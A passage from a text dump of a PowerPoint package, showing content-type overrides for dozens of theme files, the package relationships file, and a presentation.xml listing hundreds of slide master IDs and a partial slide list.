  <Override PartName="/ppt/theme/theme31.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme32.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme33.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme34.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme35.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme36.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme37.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme38.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme39.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme4.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme40.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme41.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme42.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme43.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme44.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme45.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme46.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme47.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme48.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme49.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme5.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme50.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme51.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme52.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme53.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme54.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme55.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme56.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme57.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme58.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme59.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme6.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme60.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme61.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme62.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme63.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme64.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme65.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme66.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme67.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme68.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme69.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme7.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme70.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme71.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme72.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme73.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme74.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme75.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme76.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme77.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme78.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme79.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme8.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme80.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme81.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme82.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme83.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme84.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme85.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme86.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme87.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme88.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme89.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme9.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme90.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme91.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme92.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme93.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme94.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme95.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme96.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme97.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme98.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/theme/theme99.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/>
  <Override PartName="/ppt/viewProps.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.viewProps+xml"/>
</Types>
</file>

<file path=_rels/.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="ppt/presentation.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/thumbnail" Target="docProps/thumbnail.jpeg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/custom-properties" Target="docProps/custom.xml"/></Relationships>
</file>

<file path=ppt/presentation.xml><?xml version="1.0" encoding="utf-8"?>
<p:presentation xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:sldMasterIdLst>
    <p:sldMasterId id="2147483648" r:id="rId1"/>
    <p:sldMasterId id="2147483659" r:id="rId3"/>
    <p:sldMasterId id="2147483670" r:id="rId4"/>
    <p:sldMasterId id="2147483681" r:id="rId5"/>
    <p:sldMasterId id="2147483692" r:id="rId6"/>
    <p:sldMasterId id="2147483703" r:id="rId7"/>
    <p:sldMasterId id="2147483714" r:id="rId8"/>
    <p:sldMasterId id="2147483725" r:id="rId9"/>
    <p:sldMasterId id="2147483736" r:id="rId10"/>
    <p:sldMasterId id="2147483747" r:id="rId11"/>
    <p:sldMasterId id="2147483758" r:id="rId12"/>
    <p:sldMasterId id="2147483769" r:id="rId13"/>
    <p:sldMasterId id="2147483780" r:id="rId14"/>
    <p:sldMasterId id="2147483791" r:id="rId15"/>
    <p:sldMasterId id="2147483802" r:id="rId16"/>
    <p:sldMasterId id="2147483813" r:id="rId17"/>
    <p:sldMasterId id="2147483824" r:id="rId18"/>
    <p:sldMasterId id="2147483835" r:id="rId19"/>
    <p:sldMasterId id="2147483846" r:id="rId20"/>
    <p:sldMasterId id="2147483857" r:id="rId21"/>
    <p:sldMasterId id="2147483868" r:id="rId22"/>
    <p:sldMasterId id="2147483879" r:id="rId23"/>
    <p:sldMasterId id="2147483890" r:id="rId24"/>
    <p:sldMasterId id="2147483901" r:id="rId25"/>
    <p:sldMasterId id="2147483912" r:id="rId26"/>
    <p:sldMasterId id="2147483923" r:id="rId27"/>
    <p:sldMasterId id="2147483934" r:id="rId28"/>
    <p:sldMasterId id="2147483945" r:id="rId29"/>
    <p:sldMasterId id="2147483956" r:id="rId30"/>
    <p:sldMasterId id="2147483967" r:id="rId31"/>
    <p:sldMasterId id="2147483978" r:id="rId32"/>
    <p:sldMasterId id="2147483989" r:id="rId33"/>
    <p:sldMasterId id="2147484000" r:id="rId34"/>
    <p:sldMasterId id="2147484011" r:id="rId35"/>
    <p:sldMasterId id="2147484022" r:id="rId36"/>
    <p:sldMasterId id="2147484033" r:id="rId37"/>
    <p:sldMasterId id="2147484044" r:id="rId38"/>
    <p:sldMasterId id="2147484055" r:id="rId39"/>
    <p:sldMasterId id="2147484066" r:id="rId40"/>
    <p:sldMasterId id="2147484077" r:id="rId41"/>
    <p:sldMasterId id="2147484088" r:id="rId42"/>
    <p:sldMasterId id="2147484099" r:id="rId43"/>
    <p:sldMasterId id="2147484110" r:id="rId44"/>
    <p:sldMasterId id="2147484121" r:id="rId45"/>
    <p:sldMasterId id="2147484132" r:id="rId46"/>
    <p:sldMasterId id="2147484143" r:id="rId47"/>
    <p:sldMasterId id="2147484154" r:id="rId48"/>
    <p:sldMasterId id="2147484165" r:id="rId49"/>
    <p:sldMasterId id="2147484176" r:id="rId50"/>
    <p:sldMasterId id="2147484187" r:id="rId51"/>
    <p:sldMasterId id="2147484198" r:id="rId52"/>
    <p:sldMasterId id="2147484209" r:id="rId53"/>
    <p:sldMasterId id="2147484220" r:id="rId54"/>
    <p:sldMasterId id="2147484231" r:id="rId55"/>
    <p:sldMasterId id="2147484242" r:id="rId56"/>
    <p:sldMasterId id="2147484253" r:id="rId57"/>
    <p:sldMasterId id="2147484264" r:id="rId58"/>
    <p:sldMasterId id="2147484275" r:id="rId59"/>
    <p:sldMasterId id="2147484286" r:id="rId60"/>
    <p:sldMasterId id="2147484297" r:id="rId61"/>
    <p:sldMasterId id="2147484308" r:id="rId62"/>
    <p:sldMasterId id="2147484319" r:id="rId63"/>
    <p:sldMasterId id="2147484330" r:id="rId64"/>
    <p:sldMasterId id="2147484341" r:id="rId65"/>
    <p:sldMasterId id="2147484352" r:id="rId66"/>
    <p:sldMasterId id="2147484363" r:id="rId67"/>
    <p:sldMasterId id="2147484374" r:id="rId68"/>
    <p:sldMasterId id="2147484385" r:id="rId69"/>
    <p:sldMasterId id="2147484396" r:id="rId70"/>
    <p:sldMasterId id="2147484407" r:id="rId71"/>
    <p:sldMasterId id="2147484418" r:id="rId72"/>
    <p:sldMasterId id="2147484429" r:id="rId73"/>
    <p:sldMasterId id="2147484440" r:id="rId74"/>
    <p:sldMasterId id="2147484451" r:id="rId75"/>
    <p:sldMasterId id="2147484462" r:id="rId76"/>
    <p:sldMasterId id="2147484473" r:id="rId77"/>
    <p:sldMasterId id="2147484484" r:id="rId78"/>
    <p:sldMasterId id="2147484495" r:id="rId79"/>
    <p:sldMasterId id="2147484506" r:id="rId80"/>
    <p:sldMasterId id="2147484517" r:id="rId81"/>
    <p:sldMasterId id="2147484528" r:id="rId82"/>
    <p:sldMasterId id="2147484539" r:id="rId83"/>
    <p:sldMasterId id="2147484550" r:id="rId84"/>
    <p:sldMasterId id="2147484561" r:id="rId85"/>
    <p:sldMasterId id="2147484572" r:id="rId86"/>
    <p:sldMasterId id="2147484583" r:id="rId87"/>
    <p:sldMasterId id="2147484594" r:id="rId88"/>
    <p:sldMasterId id="2147484605" r:id="rId89"/>
    <p:sldMasterId id="2147484616" r:id="rId90"/>
    <p:sldMasterId id="2147484627" r:id="rId91"/>
    <p:sldMasterId id="2147484638" r:id="rId92"/>
    <p:sldMasterId id="2147484649" r:id="rId93"/>
    <p:sldMasterId id="2147484660" r:id="rId94"/>
    <p:sldMasterId id="2147484671" r:id="rId95"/>
    <p:sldMasterId id="2147484682" r:id="rId96"/>
    <p:sldMasterId id="2147484693" r:id="rId97"/>
    <p:sldMasterId id="2147484704" r:id="rId98"/>
    <p:sldMasterId id="2147484715" r:id="rId99"/>
    <p:sldMasterId id="2147484726" r:id="rId100"/>
    <p:sldMasterId id="2147484737" r:id="rId101"/>
    <p:sldMasterId id="2147484748" r:id="rId102"/>
    <p:sldMasterId id="2147484759" r:id="rId103"/>
    <p:sldMasterId id="2147484770" r:id="rId104"/>
    <p:sldMasterId id="2147484781" r:id="rId105"/>
    <p:sldMasterId id="2147484792" r:id="rId106"/>
    <p:sldMasterId id="2147484803" r:id="rId107"/>
    <p:sldMasterId id="2147484814" r:id="rId108"/>
    <p:sldMasterId id="2147484825" r:id="rId109"/>
    <p:sldMasterId id="2147484836" r:id="rId110"/>
    <p:sldMasterId id="2147484847" r:id="rId111"/>
    <p:sldMasterId id="2147484858" r:id="rId112"/>
    <p:sldMasterId id="2147484869" r:id="rId113"/>
    <p:sldMasterId id="2147484880" r:id="rId114"/>
    <p:sldMasterId id="2147484891" r:id="rId115"/>
    <p:sldMasterId id="2147484902" r:id="rId116"/>
    <p:sldMasterId id="2147484913" r:id="rId117"/>
    <p:sldMasterId id="2147484924" r:id="rId118"/>
    <p:sldMasterId id="2147484935" r:id="rId119"/>
    <p:sldMasterId id="2147484946" r:id="rId120"/>
    <p:sldMasterId id="2147484957" r:id="rId121"/>
    <p:sldMasterId id="2147484968" r:id="rId122"/>
    <p:sldMasterId id="2147484979" r:id="rId123"/>
    <p:sldMasterId id="2147484990" r:id="rId124"/>
    <p:sldMasterId id="2147485001" r:id="rId125"/>
    <p:sldMasterId id="2147485012" r:id="rId126"/>
    <p:sldMasterId id="2147485023" r:id="rId127"/>
    <p:sldMasterId id="2147485034" r:id="rId128"/>
    <p:sldMasterId id="2147485045" r:id="rId129"/>
    <p:sldMasterId id="2147485056" r:id="rId130"/>
    <p:sldMasterId id="2147485067" r:id="rId131"/>
    <p:sldMasterId id="2147485078" r:id="rId132"/>
    <p:sldMasterId id="2147485089" r:id="rId133"/>
    <p:sldMasterId id="2147485100" r:id="rId134"/>
    <p:sldMasterId id="2147485111" r:id="rId135"/>
    <p:sldMasterId id="2147485122" r:id="rId136"/>
    <p:sldMasterId id="2147485133" r:id="rId137"/>
    <p:sldMasterId id="2147485144" r:id="rId138"/>
    <p:sldMasterId id="2147485155" r:id="rId139"/>
    <p:sldMasterId id="2147485166" r:id="rId140"/>
    <p:sldMasterId id="2147485177" r:id="rId141"/>
    <p:sldMasterId id="2147485188" r:id="rId142"/>
    <p:sldMasterId id="2147485199" r:id="rId143"/>
    <p:sldMasterId id="2147485210" r:id="rId144"/>
    <p:sldMasterId id="2147485221" r:id="rId145"/>
    <p:sldMasterId id="2147485232" r:id="rId146"/>
    <p:sldMasterId id="2147485243" r:id="rId147"/>
    <p:sldMasterId id="2147485254" r:id="rId148"/>
    <p:sldMasterId id="2147485265" r:id="rId149"/>
    <p:sldMasterId id="2147485276" r:id="rId150"/>
    <p:sldMasterId id="2147485287" r:id="rId151"/>
    <p:sldMasterId id="2147485298" r:id="rId152"/>
    <p:sldMasterId id="2147485309" r:id="rId153"/>
    <p:sldMasterId id="2147485320" r:id="rId154"/>
    <p:sldMasterId id="2147485331" r:id="rId155"/>
    <p:sldMasterId id="2147485342" r:id="rId156"/>
    <p:sldMasterId id="2147485353" r:id="rId157"/>
    <p:sldMasterId id="2147485364" r:id="rId158"/>
    <p:sldMasterId id="2147485375" r:id="rId159"/>
    <p:sldMasterId id="2147485386" r:id="rId160"/>
    <p:sldMasterId id="2147485397" r:id="rId161"/>
    <p:sldMasterId id="2147485408" r:id="rId162"/>
    <p:sldMasterId id="2147485419" r:id="rId163"/>
    <p:sldMasterId id="2147485430" r:id="rId164"/>
    <p:sldMasterId id="2147485441" r:id="rId165"/>
    <p:sldMasterId id="2147485452" r:id="rId166"/>
    <p:sldMasterId id="2147485463" r:id="rId167"/>
    <p:sldMasterId id="2147485474" r:id="rId168"/>
    <p:sldMasterId id="2147485485" r:id="rId169"/>
    <p:sldMasterId id="2147485496" r:id="rId170"/>
    <p:sldMasterId id="2147485507" r:id="rId171"/>
    <p:sldMasterId id="2147485518" r:id="rId172"/>
    <p:sldMasterId id="2147485529" r:id="rId173"/>
    <p:sldMasterId id="2147485540" r:id="rId174"/>
    <p:sldMasterId id="2147485551" r:id="rId175"/>
    <p:sldMasterId id="2147485562" r:id="rId176"/>
    <p:sldMasterId id="2147485573" r:id="rId177"/>
    <p:sldMasterId id="2147485584" r:id="rId178"/>
    <p:sldMasterId id="2147485595" r:id="rId179"/>
    <p:sldMasterId id="2147485606" r:id="rId180"/>
    <p:sldMasterId id="2147485617" r:id="rId181"/>
    <p:sldMasterId id="2147485628" r:id="rId182"/>
    <p:sldMasterId id="2147485639" r:id="rId183"/>
    <p:sldMasterId id="2147485650" r:id="rId184"/>
    <p:sldMasterId id="2147485661" r:id="rId185"/>
    <p:sldMasterId id="2147485672" r:id="rId186"/>
    <p:sldMasterId id="2147485683" r:id="rId187"/>
    <p:sldMasterId id="2147485694" r:id="rId188"/>
    <p:sldMasterId id="2147485705" r:id="rId189"/>
    <p:sldMasterId id="2147485716" r:id="rId190"/>
    <p:sldMasterId id="2147485727" r:id="rId191"/>
    <p:sldMasterId id="2147485738" r:id="rId192"/>
    <p:sldMasterId id="2147485749" r:id="rId193"/>
    <p:sldMasterId id="2147485760" r:id="rId194"/>
    <p:sldMasterId id="2147485771" r:id="rId195"/>
    <p:sldMasterId id="2147485782" r:id="rId196"/>
    <p:sldMasterId id="2147485793" r:id="rId197"/>
    <p:sldMasterId id="2147485804" r:id="rId198"/>
    <p:sldMasterId id="2147485815" r:id="rId199"/>
    <p:sldMasterId id="2147485826" r:id="rId200"/>
    <p:sldMasterId id="2147485837" r:id="rId201"/>
    <p:sldMasterId id="2147485848" r:id="rId202"/>
    <p:sldMasterId id="2147485859" r:id="rId203"/>
    <p:sldMasterId id="2147485870" r:id="rId204"/>
    <p:sldMasterId id="2147485881" r:id="rId205"/>
    <p:sldMasterId id="2147485892" r:id="rId206"/>
    <p:sldMasterId id="2147485903" r:id="rId207"/>
    <p:sldMasterId id="2147485914" r:id="rId208"/>
    <p:sldMasterId id="2147485925" r:id="rId209"/>
    <p:sldMasterId id="2147485936" r:id="rId210"/>
    <p:sldMasterId id="2147485947" r:id="rId211"/>
    <p:sldMasterId id="2147485958" r:id="rId212"/>
    <p:sldMasterId id="2147485969" r:id="rId213"/>
    <p:sldMasterId id="2147485980" r:id="rId214"/>
    <p:sldMasterId id="2147485991" r:id="rId215"/>
    <p:sldMasterId id="2147486002" r:id="rId216"/>
    <p:sldMasterId id="2147486013" r:id="rId217"/>
    <p:sldMasterId id="2147486024" r:id="rId218"/>
    <p:sldMasterId id="2147486035" r:id="rId219"/>
    <p:sldMasterId id="2147486046" r:id="rId220"/>
    <p:sldMasterId id="2147486057" r:id="rId221"/>
    <p:sldMasterId id="2147486068" r:id="rId222"/>
    <p:sldMasterId id="2147486079" r:id="rId223"/>
    <p:sldMasterId id="2147486090" r:id="rId224"/>
    <p:sldMasterId id="2147486101" r:id="rId225"/>
    <p:sldMasterId id="2147486112" r:id="rId226"/>
    <p:sldMasterId id="2147486123" r:id="rId227"/>
    <p:sldMasterId id="2147486134" r:id="rId228"/>
    <p:sldMasterId id="2147486145" r:id="rId229"/>
    <p:sldMasterId id="2147486156" r:id="rId230"/>
    <p:sldMasterId id="2147486167" r:id="rId231"/>
    <p:sldMasterId id="2147486178" r:id="rId232"/>
    <p:sldMasterId id="2147486189" r:id="rId233"/>
    <p:sldMasterId id="2147486200" r:id="rId234"/>
    <p:sldMasterId id="2147486211" r:id="rId235"/>
    <p:sldMasterId id="2147486222" r:id="rId236"/>
    <p:sldMasterId id="2147486233" r:id="rId237"/>
    <p:sldMasterId id="2147486244" r:id="rId238"/>
    <p:sldMasterId id="2147486255" r:id="rId239"/>
    <p:sldMasterId id="2147486266" r:id="rId240"/>
    <p:sldMasterId id="2147486277" r:id="rId241"/>
    <p:sldMasterId id="2147486288" r:id="rId242"/>
    <p:sldMasterId id="2147486299" r:id="rId243"/>
    <p:sldMasterId id="2147486310" r:id="rId244"/>
    <p:sldMasterId id="2147486321" r:id="rId245"/>
    <p:sldMasterId id="2147486332" r:id="rId246"/>
    <p:sldMasterId id="2147486343" r:id="rId247"/>
    <p:sldMasterId id="2147486354" r:id="rId248"/>
    <p:sldMasterId id="2147486365" r:id="rId249"/>
    <p:sldMasterId id="2147486376" r:id="rId250"/>
    <p:sldMasterId id="2147486387" r:id="rId251"/>
    <p:sldMasterId id="2147486398" r:id="rId252"/>
    <p:sldMasterId id="2147486409" r:id="rId253"/>
    <p:sldMasterId id="2147486420" r:id="rId254"/>
    <p:sldMasterId id="2147486431" r:id="rId255"/>
    <p:sldMasterId id="2147486442" r:id="rId256"/>
    <p:sldMasterId id="2147486453" r:id="rId257"/>
    <p:sldMasterId id="2147486464" r:id="rId258"/>
    <p:sldMasterId id="2147486475" r:id="rId259"/>
    <p:sldMasterId id="2147486486" r:id="rId260"/>
    <p:sldMasterId id="2147486497" r:id="rId261"/>
    <p:sldMasterId id="2147486508" r:id="rId262"/>
    <p:sldMasterId id="2147486519" r:id="rId263"/>
    <p:sldMasterId id="2147486530" r:id="rId264"/>
    <p:sldMasterId id="2147486541" r:id="rId265"/>
    <p:sldMasterId id="2147486552" r:id="rId266"/>
    <p:sldMasterId id="2147486563" r:id="rId267"/>
    <p:sldMasterId id="2147486574" r:id="rId268"/>
    <p:sldMasterId id="2147486585" r:id="rId269"/>
    <p:sldMasterId id="2147486596" r:id="rId270"/>
    <p:sldMasterId id="2147486607" r:id="rId271"/>
    <p:sldMasterId id="2147486618" r:id="rId272"/>
    <p:sldMasterId id="2147486629" r:id="rId273"/>
    <p:sldMasterId id="2147486640" r:id="rId274"/>
    <p:sldMasterId id="2147486651" r:id="rId275"/>
    <p:sldMasterId id="2147486662" r:id="rId276"/>
    <p:sldMasterId id="2147486673" r:id="rId277"/>
    <p:sldMasterId id="2147486684" r:id="rId278"/>
    <p:sldMasterId id="2147486695" r:id="rId279"/>
    <p:sldMasterId id="2147486706" r:id="rId280"/>
    <p:sldMasterId id="2147486717" r:id="rId281"/>
    <p:sldMasterId id="2147486728" r:id="rId282"/>
    <p:sldMasterId id="2147486739" r:id="rId283"/>
    <p:sldMasterId id="2147486750" r:id="rId284"/>
    <p:sldMasterId id="2147486761" r:id="rId285"/>
    <p:sldMasterId id="2147486772" r:id="rId286"/>
    <p:sldMasterId id="2147486783" r:id="rId287"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId309"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId591"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId288"/>
    <p:sldId id="293" r:id="rId289"/>
    <p:sldId id="294" r:id="rId290"/>
    <p:sldId id="295" r:id="rId291"/>
    <p:sldId id="284" r:id="rId292"/>
    <p:sldId id="285" r:id="rId293"/>
    <p:sldId id="286" r:id="rId294"/>
    <p:sldId id="287" r:id="rId295"/>
    <p:sldId id="288" r:id="rId296"/>
    <p:sldId id="289" r:id="rId297"/>
    <p:sldId id="297" r:id="rId298"/>
    <p:sldId id="298" r:id="rId299"/>
    <p:sldId id="299" r:id="rId300"/>
    <p:sldId id="290" r:id="rId301"/>
    <p:sldId id="291" r:id="rId302"/>
    <p:sldId id="292" r:id="rId303"/>
    <p:sldId id="282" r:id="rId304"/>
    <p:sldId id="309" r:id="rId305"/>
    <p:sldId id="310" r:id="rId306"/>
    <p:sldId id="311" r:id="rId307"/>
    <p:sldId id="312" r:id="rId308"/>
    <p:sldId id="313" r:id="rId310"/>
    <p:sldId id="314" r:id="rId311"/>
    <p:sldId id="315" r:id="rId312"/>
    <p:sldId id="316" r:id="rId313"/>
    <p:sldId id="317" r:id="rId314"/>
    <p:sldId id="318" r:id="rId315"/>
    <p:sldId id="319" r:id="rId316"/>
    <p:sldId id="320" r:id="rId317"/>
    <p:sldId id="321" r:id="rId318"/>
    <p:sldId id="322" r:id="rId319"/>
    <p:sldId id="323" r:id="rId320"/>
    <p:sldId id="324" r:id="rId321"/>
    <p:sldId id="325" r:id="rId322"/>
    <p:sldId id="326" r:id="rId323"/>
    <p:sldId id="327" r:id="rId324"/>
    <p:sldId id="328" r:id="rId325"/>
    <p:sldId id="329" r:id="rId326"/>
    <p:sldId id="330" r:id="rId327"/>
    <p:sldId id="331" r:id="rId328"/>
    <p:sldId id="332" r:id="rId329"/>
    <p:sldId id="333" r:id="rId330"/>
    <p:sldId id="334" r:id="rId331"/>
    <p:sldId id="335" r:id="rId332"/>
    <p:sldId id="336" r:id="rId333"/>
    <p:sldId id="337" r:id="rId334"/>
    <p:sldId id="338" r:id="rId335"/>
    <p:sldId id="339" r:id="rId336"/>
    <p:sldId id="340" r:id="rId337"/>
    <p:sldId id="341" r:id="rId338"/>
    <p:sldId id="342" r:id="rId339"/>
    <p:sldId id="343" r:id="rId340"/>
    <p:sldId id="344" r:id="rId341"/>
    <p:sldId id="345" r:id="rId342"/>
    <p:sldId id="346" r:id="rId343"/>
    <p:sldId id="347" r:id="rId344"/>
    <p:sldId id="348" r:id="rId345"/>
    <p:sldId id="349" r:id="rId346"/>
    <p:sldId id="350" r:id="rId347"/>
    <p:sldId id="351" r:id="rId348"/>
    <p:sldId id="352" r:id="rId349"/>
    <p:sldId id="353" r:id="rId350"/>
    <p:sldId id="354" r:id="rId351"/>
    <p:sldId id="355" r:id="rId352"/>
    <p:sldId id="356" r:id="rId353"/>
    <p:sldId id="357" r:id="rId354"/>
    <p:sldId id="358" r:id="rId355"/>
    <p:sldId id="359" r:id="rId356"/>
    <p:sldId id="360" r:id="rId357"/>
    <p:sldId id="361" r:id="rId358"/>
    <p:sldId id="362" r:id="rId359"/>
    <p:sldId id="363" r:id="rId360"/>
    <p:sldId id="364" r:id="rId361"/>
    <p:sldId id="365" r:id="rId362"/>
    <p:sldId id="366" r:id="rId363"/>
    <p:sldId id="367" r:id="rId364"/>
    <p:sldId id="368" r:id="rId365"/>
    <p:sldId id="369" r:id="rId366"/>
    <p:sldId id="370" r:id="rId367"/>
    <p:sldId id="371" r:id="rId368"/>
    <p:sldId id="372" r:id="rId369"/>
    <p:sldId id="373" r:id="rId370"/>
    <p:sldId id="374" r:id="rId371"/>
    <p:sldId id="375" r:id="rId372"/>
    <p:sldId id="376" r:id="rId373"/>
    <p:sldId id="377" r:id="rId374"/>
    <p:sldId id="378" r:id="rId375"/>
    <p:sldId id="379" r:id="rId376"/>
    <p:sldId id="380" r:id="rId377"/>
    <p:sldId id="381" r:id="rId378"/>
    <p:sldId id="382" r:id="rId379"/>
    <p:sldId id="383" r:id="rId380"/>
    <p:sldId id="384" r:id="rId381"/>
    <p:sldId id="385" r:id="rId382"/>
    <p:sldId id="386" r:id="rId383"/>
